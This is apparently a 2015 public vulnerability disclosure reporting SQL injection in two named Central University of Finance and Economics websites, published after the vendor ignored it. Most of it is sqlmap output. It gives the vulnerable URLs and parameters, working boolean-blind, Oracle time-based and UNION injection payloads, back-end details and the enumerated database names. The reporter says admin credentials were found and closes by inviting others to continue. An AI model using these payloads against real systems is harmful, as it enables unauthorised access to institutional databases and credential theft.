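2015-03-24: Details reported to the vendor; awaiting the vendor's response
2015-03-29: The vendor chose to ignore the vulnerability; details disclosed to the public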
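As the title says. There are quite a lot of tables and the dump ran very slowly, so I stopped.
Central University of Finance and Economics employment site: http://scc.cufe.edu.cn/jyw_zc/detail.jsp?seq=2310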
sqlmap:
---
Place: GET
Parameter: seq
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: seq=2310' AND 2927=2927 AND 'cLEy'='cLEy

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: seq=2310' AND 9752=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(114)||CHR(66)||CHR(109),5) AND 'tVAQ'='tVAQ
---
web application technology: JSP, Apache 2.0.59
back-end DBMS: Oracle
Databases:
available databases [19]:
[*] BKZSW
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] JYZXGL
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XSCWZ
[*] XSXT
Central University of Finance and Economics Business School: http://bsen.cufe.edu.cn/news.aspx?id=12&type=2
Injectable parameter: id=12
sqlmap:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12 AND 2268=2268&type=2

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=-1666 UNION ALL SELECT 42,CHAR(113)+CHAR(114)+CHAR(115)+CHAR(114)+CHAR(113)+CHAR(104)+CHAR(107)+CHAR(89)+CHAR(120)+CHAR(86)+CHAR(71)+CHAR(120)+CHAR(107)+CHAR(81)+CHAR(87)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(114)+CHAR(113),42,42,42,42,42,42,42-- &type=2
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Databases:
available databases [7]:
[*] db_cufeIT
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
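For this one I found the account, the password, and the admin backend. The password is a 16-character MD5 hash that I could not crack, so I did not bother waiting for a result and did not log in to the backend.
Proven!
Over to you.
Severity: no impact (ignored by vendor)
Ignored at: 2015-03-29 11:58
None yet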